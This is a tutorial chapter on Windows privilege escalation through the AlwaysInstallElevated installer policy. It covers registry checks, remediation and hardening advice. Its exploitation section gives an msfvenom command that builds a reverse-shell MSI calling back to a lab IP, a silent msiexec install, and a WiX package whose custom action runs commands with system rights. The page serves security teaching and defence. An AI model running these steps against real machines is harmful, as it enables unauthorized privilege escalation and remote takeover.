10 - Always Install Elevated

Topics

1. Introduction to the Windows Shells

2. Windows Permissions

3. Reverse Shells in Windows

4. SeImpersonatePrivilege Exploitation

5. On Cross Compilation

6. Windows Services

7. Weak Service Permissions

8. Unquoted Service Path

9. DLL Hijacking

10. Always Install Elevated

11. Files with Sensitive Data

12. Windows Hashes

13. Stored Credentials and the Windows Vault

14. Scheduled Task

15. Critical Registry Paths

16. Useful Tools

17. AMSI Bypass

Always Install with Elevated Privileges

The "Always Install with Elevated Privileges" policy in Windows allows users to install software with elevated permissions, even if they are not administrators. This setting applies to both Computer Configuration and User Configuration policies.

Security Risks

• Malicious actors can exploit this setting to execute arbitrary code during software installation.

• If enabled, it creates a significant security vulnerability, potentially leading to privilege escalation.

---

Configuration Check

Using Group Policy Editor

You can check this setting in the Group Policy Editor (gpedit.msc):

1. Navigate to:

   • Computer Configuration → Administrative Templates → Windows Components → Windows Installer → "Always install with elevated privileges."

   • User Configuration → Administrative Templates → Windows Components → Windows Installer → "Always install with elevated privileges."

2. Ensure the policy is disabled to prevent misuse.

Using PowerShell

To verify the configuration via PowerShell:

Get-ItemProperty -Path "HKLM:\Software\Policies\Microsoft\Windows\Installer" -Name AlwaysInstallElevated
Get-ItemProperty -Path "HKCU:\Software\Policies\Microsoft\Windows\Installer" -Name AlwaysInstallElevated

If both values are set to 1, the policy is active.

Set the Policy

To enable or disable the policy via PowerShell:

# Enable the policy (dangerous)
Set-ItemProperty -Path 'HKLM:\Software\Policies\Microsoft\Windows\Installer' -Name 'AlwaysInstallElevated' -Value 1
Set-ItemProperty -Path 'HKCU:\Software\Policies\Microsoft\Windows\Installer' -Name 'AlwaysInstallElevated' -Value 1

# Disable the policy (recommended)
Set-ItemProperty -Path 'HKLM:\Software\Policies\Microsoft\Windows\Installer' -Name 'AlwaysInstallElevated' -Value 0
Set-ItemProperty -Path 'HKCU:\Software\Policies\Microsoft\Windows\Installer' -Name 'AlwaysInstallElevated' -Value 0

---

3. Exploitation

If this policy is enabled, attackers can generate and install a malicious Microsoft Software Installer (.msi) package to gain elevated privileges.

Generate Malicious MSI with msfvenom

msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.122.1 LPORT=7777 -f msi > sample.msi

Install the Malicious Package

msiexec /quiet /qn /i sample.msi

This executes the payload embedded in the MSI file with elevated privileges.

---

Creating a Custom MSI

Instead of using msfvenom, you can create a custom MSI with the WiX Toolset to execute specific commands or scripts during installation.

Steps to Create a Custom MSI

1. Download WiX Toolset

   • Download WiX v3.14.1 from WiX Releases.

2. Install and Update PATH Add WiX binaries to your system path:

   set PATH=%PATH%;"C:\Program Files (x86)\WiX Toolset v3.14\bin"

3. Create the WiX Project File Example sample.wxs file:

   <?xml version="1.0"?>
   <Wix xmlns="http://schemas.microsoft.com/wix/2006/wi">
     <Product Id="*" UpgradeCode="12345678-1234-1234-1234-111111111111" Name="Example Product Name"
              Version="0.0.1" Manufacturer="@_xpn_" Language="1033">
       <Package InstallerVersion="200" Compressed="yes" Comments="Windows Installer Package"/>
       <Media Id="1" Cabinet="product.cab" EmbedCab="yes"/>
       <Directory Id="TARGETDIR" Name="SourceDir">
         <Directory Id="ProgramFilesFolder">
           <Directory Id="INSTALLLOCATION" Name="Example">
             <Component Id="ApplicationFiles" Guid="12345678-1234-1234-1234-222222222222">
             </Component>
           </Directory>
         </Directory>
       </Directory>
       <Feature Id="DefaultFeature" Level="1">
         <ComponentRef Id="ApplicationFiles"/>
       </Feature>
       <Property Id="cmdline">cmd.exe /C whoami /groups > C:\Users\Quickemu\Desktop\test.txt</Property>
       <CustomAction Id="Stage1" Execute="deferred" Directory="TARGETDIR" ExeCommand='[cmdline]' Return="ignore" Impersonate="no"/>
       <CustomAction Id="Stage2" Execute="deferred" Script="vbscript" Return="check">
         fail_here
       </CustomAction>
       <InstallExecuteSequence>
         <Custom Action="Stage1" After="InstallInitialize"></Custom>
         <Custom Action="Stage2" Before="InstallFiles"></Custom>
       </InstallExecuteSequence>
     </Product>
   </Wix>

4. Compile the WiX Project Convert the .wxs file into a .wixobj and then into an MSI file:

   candle sample.wxs
   light.exe sample.wixobj

5. Execute the Custom MSI

   msiexec /quiet /qn /i sample.msi

---

Recommendations

• Disable the Policy: Ensure the Always Install with Elevated Privileges policy is disabled in both HKLM and HKCU.

• Audit Installer Files: Regularly review MSI packages for malicious content.

• Restrict Permissions: Limit access to installer execution to trusted users only.

---

Other Resources

• WiX Toolset Official Site

• WiX Elevated Install Guide

Disclaimer

❗ Never use tools and techniques on real IP addresses, hosts or networks without proper authorization!❗